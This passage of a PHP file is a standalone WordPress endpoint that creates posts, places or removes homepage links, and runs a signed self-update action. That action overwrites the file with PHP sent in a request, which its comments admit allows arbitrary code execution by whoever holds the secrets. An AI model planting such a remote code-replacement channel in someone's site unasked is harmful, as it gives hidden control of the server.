        'post_name' => isset($payload['slug']) ? sanitize_title($payload['slug']) : '',
        'post_content' => $content,
        'post_status' => $status,
        'post_type' => $post_type,
    );
    if (!empty($payload['date'])) {
        $postarr['post_date'] = $payload['date'];
    } elseif (!empty($payload['publicationDate'])) {
        $postarr['post_date'] = $payload['publicationDate'];
    }
    $post_id = wp_insert_post($postarr, true);
    if (is_wp_error($post_id)) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'insert_failed', 'message' => $post_id->get_error_message()));
    }
    easypost_endpoint_json(201, array(
        'ok' => true,
        'id' => (int) $post_id,
        'postId' => (int) $post_id,
        'link' => get_permalink($post_id),
        'postUrl' => get_permalink($post_id),
        'slug' => get_post_field('post_name', $post_id),
        'status' => get_post_status($post_id),
        'created' => true,
    ));
}

/**
 * Verifies the release signature of a self-update payload, or exits.
 *
 * The signed message is "<version>\n<sha256 of the new file>", checked with
 * openssl_verify() and SHA-256 against the public key embedded in the
 * configuration. Any result other than 1 is rejected.
 */
function easypost_endpoint_verify_release_signature($payload, $computed_sha256) {
    $config = easypost_endpoint_config();
    if (empty($config['ota_release_public_key_pem']) || !is_string($config['ota_release_public_key_pem'])) {
        easypost_endpoint_json(501, array('ok' => false, 'error' => 'ota_release_public_key_missing'));
    }
    if (!function_exists('openssl_verify')) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'openssl_unavailable'));
    }
    if (!isset($payload['signature']) || !is_string($payload['signature']) || trim($payload['signature']) === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_required'));
    }
    $signature = base64_decode($payload['signature'], true);
    if ($signature === false || $signature === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_invalid'));
    }
    $signed_payload = $payload['version'] . "\n" . $computed_sha256;
    $verified = openssl_verify($signed_payload, $signature, $config['ota_release_public_key_pem'], OPENSSL_ALGO_SHA256);
    if ($verified !== 1) {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_invalid'));
    }
}

/**
 * Action update_endpoint: replaces this file with PHP supplied in the request.
 *
 * After validating the fields, matching the SHA-256 and verifying the release
 * signature, the decoded PHP is written to a temp file in this directory,
 * given this file's permission bits and renamed over __FILE__. The opcache
 * entry is then invalidated.
 *
 * The new file is not inspected beyond hash and signature, and it carries its
 * own configuration constant, so an update can also change the token and the
 * release key. Whoever holds both the request secret and the release signing
 * key can therefore run arbitrary PHP on the host. For incident response, the
 * file on disk may differ from any earlier copy; compare against backups and
 * check the modification time.
 */
function easypost_endpoint_update_endpoint($payload) {
    if (!isset($payload['version']) || !is_string($payload['version']) || trim($payload['version']) === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'version_required'));
    }
    if (!isset($payload['sha256']) || !is_string($payload['sha256']) || trim($payload['sha256']) === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_required'));
    }
    if (!preg_match('/\A[a-f0-9]{64}\z/', $payload['sha256'])) {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_invalid'));
    }
    if (!isset($payload['phpBase64']) || !is_string($payload['phpBase64']) || trim($payload['phpBase64']) === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'php_base64_required'));
    }
    $decoded_php = base64_decode($payload['phpBase64'], true);
    if ($decoded_php === false || $decoded_php === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'php_base64_invalid'));
    }
    $computed_sha256 = hash('sha256', $decoded_php);
    if (!hash_equals($payload['sha256'], $computed_sha256)) {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_mismatch'));
    }
    easypost_endpoint_verify_release_signature($payload, $computed_sha256);
    $tmp_path = tempnam(__DIR__, 'easypost-update-');
    if (!$tmp_path) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'temporary_write_failed'));
    }
    $bytes = file_put_contents($tmp_path, $decoded_php, LOCK_EX);
    if ($bytes === false || $bytes !== strlen($decoded_php)) {
        @unlink($tmp_path);
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'temporary_write_failed'));
    }
    @chmod($tmp_path, fileperms(__FILE__) & 0777);
    if (!rename($tmp_path, __FILE__)) {
        @unlink($tmp_path);
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'rename_failed'));
    }
    if (function_exists('opcache_invalidate')) {
        @opcache_invalidate(__FILE__, true);
    }
    if (function_exists('clearstatcache')) {
        clearstatcache(true, __FILE__);
    }
    easypost_endpoint_json(200, array(
        'ok' => true,
        'endpointVersion' => $payload['version'],
    ));
}

// ---- Request dispatch -------------------------------------------------------
// Only POST is served. WordPress is loaded before the request is
// authenticated; nothing below verify_auth runs for an unsigned request.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    easypost_endpoint_json(405, array('ok' => false, 'error' => 'method_not_allowed'));
}
$body = file_get_contents('php://input');
easypost_endpoint_bootstrap_wordpress();
easypost_endpoint_verify_auth($body);
// The action comes from the query string and defaults to 'health'.
$action = isset($_GET['action']) ? $_GET['action'] : 'health';
if ($action === 'health') {
    easypost_endpoint_health();
}
// Every handler exits through easypost_endpoint_json(), so at most one of the
// branches below runs and the final 404 is reached only for unknown actions.
$payload = easypost_endpoint_payload($body);
if ($action === 'create_post') {
    easypost_endpoint_create_post($payload);
}
if ($action === 'place_homepage_link') {
    easypost_endpoint_place_homepage_link($payload);
}
if ($action === 'remove_homepage_link') {
    easypost_endpoint_remove_homepage_link($payload);
}
if ($action === 'rotate_token') {
    easypost_endpoint_json(501, array('ok' => false, 'error' => 'rotate_token_not_implemented'));
}
if ($action === 'update_endpoint') {
    easypost_endpoint_update_endpoint($payload);
}
easypost_endpoint_json(404, array('ok' => false, 'error' => 'unknown_action'));